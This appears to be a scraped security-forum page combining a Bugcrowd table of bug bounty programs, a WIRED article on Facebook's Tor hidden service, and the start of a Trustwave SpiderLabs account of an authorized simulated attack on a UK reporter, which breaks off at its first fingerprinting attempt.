hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] MCProHosting [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Mega.co.nz [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Meldium [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Meraki [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Microsoft (bounty programs) [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Microsoft (Online Services) [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Microweber [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Millsap Independent School District [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Modus CSR [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Moneybird [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Moodle [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Motorola [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Movember [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Movielee [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward swag] [TD] Mozilla [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Myntra [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] MyStuff2 App [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Namazu [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward swag] [TD] National Cyber ??Security Center (Netherlands) [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Netagio [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Netflix [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Net Worth Pro [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Nitrous.IO [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Nokia Siemens Networks [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Norada [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] NSN Nokia Solutions Networks [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Nvidia [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Oculus [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Offers.com [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward swag] [TD] Olark [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Onavo [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] OnePageCRM [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] OpenBSD [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Openclass Knowledge Base [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] OpenText [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Opera [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Oracle [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Orkut [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] PagerDuty [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Pantheon [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Panzura [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Parse [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Paychoice [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Paymill [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Paypal [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Pidgin [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] PikaPay [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Pinoy Hack News [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Pinterest [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Piwik [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Pocket [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Polar SSL [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] PostmarkApp [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Prezi [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] PullReview [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Puppet Labs [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] PureVPN [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Qiwi [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Qmail [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Qualcomm [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Rackspace [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Reddit [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] RedHat [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Regiobank NL [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Relaso [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Ribose [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Ripple [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Riskalyze [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] Risk.io [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Salesforce [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Samba [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Samsung [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] SBWire [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame swag] [TD] Schuberg Philis [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Scorpion Software [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Security Net [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Segment.io [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Sellfy [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] ServiceRocket [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Shopify [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Silent Circle [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Simple [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Simplify [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] SiteGround [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Skuid [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Smart Budget [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] SmileznHapiez [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] SNS Bank NL [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Sonatype [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Sony [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Soundcloud [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] SplashID [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Splitwise [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] Spotify [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Sprout Social [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Square [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward swag] [TD] StatusPage.io [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Sunrise [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Symantec [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Tagged [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Tapatalk [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Tarsnap [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Team Unify [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Tele2 [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Telegram [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Tesla [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] The Humble Bundle [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Trade Only [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Tresorit [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Tuenti [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Tumblr [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Twilio [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Twitch [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Twitter [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Typo3 [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Uber [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Unitag [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] UPC [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Valve Software [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] VCE [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Venmo [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Viadeo [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Vodafone (Netherlands) [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Volcanic Pixels [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Volusion [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] VSR [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Wamba [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Webconverger [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward swag] [TD] Websecurify [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] WHMCS [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Windthorst ISD [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] X.commerce [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Xen [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Xmarks [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] XMind [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Yahoo [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Yandex [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Yesware [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] YouTube [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Zencash [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] Zendesk [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Zetetic [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Ziggo [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Zimbra [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Zynga [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes[/TD] [/TR] [/TABLE] Sursa: https://bugcrowd.com/list-of-bug-bounty-programs

Why Facebook Just Launched Its Own ‘Dark Web’ Site By Andy Greenberg 10.31.14 | 12:31 pm | Facebook has never had much of a reputation for letting users hide their identities online. But now the world’s least anonymous website has just joined the Web’s most anonymous network. In a first-of-its-kind move for a Silicon Valley giant, Facebook on Friday launched a Tor hidden service, a version of its website that runs the anonymity software Tor. That new site, which can only be accessed by users running the Tor software, bounces users’ connections through three extra encrypted hops to random computers around the Internet, making it far harder for any network spy observing that traffic to trace their origin. Inviting users to connect to Facebook over Tor may seem like a strange move; given that Facebook still requires you to log in and doesn’t allow pseudonyms (in most cases), even Tor users on the site are hardly anonymous to Facebook itself. But even so, Tor users on Facebook can now protect their identities from every other online snoop that would want to unmask them. “No, you’re not anonymous to Facebook when you log in, but this provides a huge benefit for users who want security and privacy,” says Runa Sandvik, a former Tor developer who Facebook credits with advising the project in a blog post. “You get around the censorship and local adversarial surveillance, and it adds another layer of security on top of your connection.” Tor, after all, doesn’t just let users hide their identities from the sites they visit, anonymously buying drugs on the Silk Road or uploading leaked documents to news sites through the leak platform SecureDrop. It’s also designed to circumvent censorship and surveillance that occurs much closer to the user’s own connection, such as in repressive regimes like Iran or China. And since Facebook uses SSL encryption, no surveillance system watching either Facebook’s connection or the user’s local traffic should be able to match up a user’s identity with their Facebook activity. “You get around the censorship and local adversarial surveillance, and it adds another layer of security on top of your connection.” Until now, Facebook has made it difficult for users to access its site over Tor, sometimes even blocking their connections. Because Tor users appear to log in from unusual IP addresses all over the world, they often trigger the site’s safeguards against botnets, collections of hijacked computers typically used by hackers to attack sites. Facebook security engineer Alec Muffett Doc Searls / Flickr “Tor challenges some assumptions of Facebook’s security mechanisms—for example its design means that from the perspective of our systems a person who appears to be connecting from Australia at one moment may the next appear to be in Sweden or Canada,” writes Facebook security engineer Alec Muffett. “Considerations like these have not always been reflected in Facebook’s security infrastructure, which has sometimes led to unnecessary hurdles for people who connect to Facebook using Tor.” Facebook’s Tor site is designed to be friendlier to those far-flung connections. And Sandvik says it also provides an extra layer of security than running Tor on the user’s end alone can provide. Tor users are often warned about malicious “exit nodes”, the final computer bouncing their traffic around the Internet. Such exit nodes can sometimes be used to spy on their unencrypted traffic or in some cases, even strip that encryption away. When both the user and Facebook are running Tor, however, the traffic doesn’t leave the Tor network until it’s safely within Facebook’s infrastructure. Over the past few years, sites like Google, Facebook, Twitter, and Google have all implemented default SSL encryption to protect users’ traffic. Sandvik sees Facebook’s Tor hidden service as a sign that Tor may be the next basic privacy protection Silicon Valley companies will be expected to offer their users. “I would be really excited to see other tech companies that want to do the same,” she says. “And I’d love to help them.” Sursa: Why Facebook Just Launched Its Own 'Dark Web' Site | WIRED

Hacking a Reporter: UK Edition Over the summer, a U.K. journalist asked the Trustwave SpiderLabs team to target her with an online attack. You might remember that we did the same in 2013 by setting our sites on a U.S.-based reporter. This scenario, however, would differ from the first. The reporter, Sophie, was our only target. Co-workers, company or family were off limits. Sophie wrote about the experience from her perspective here. Below, we’ll tell the story from the perspective of Trustwave SpiderLabs, playing the role of “theoretical” attacker. Online, some readers criticized Sophie for being too naïve when it came to the attack. There could be some truth to that, but we would say that with great pretext a well-executed attack rarely fails, no matter the target (and zero-days are rarely required). We’re not saying this out of pride or to take it easy on Sophie. It’s just our experience. To hedge against the risk of failure, we proposed a two-to-three stage attack. We described the first stage as a demonstration of passive information gathering and later stages only as "more active". At a high level, we approached the project as follows: Stages of activity Passive information gathering/reconnaissance Active fingerprinting Active attack First, we performed reconnaissance on Sophie and identified her potential cellphone model, her corporate e-mail address, some of her social network profiles and much more. This was a good starting point, but to increase the chance of success its helps greatly to know what operating system the target uses and fingerprint her system(s) as much as possible. Fingerprinting: First Attempt In our first attempt to fingerprint her, we created a Gmail account using a 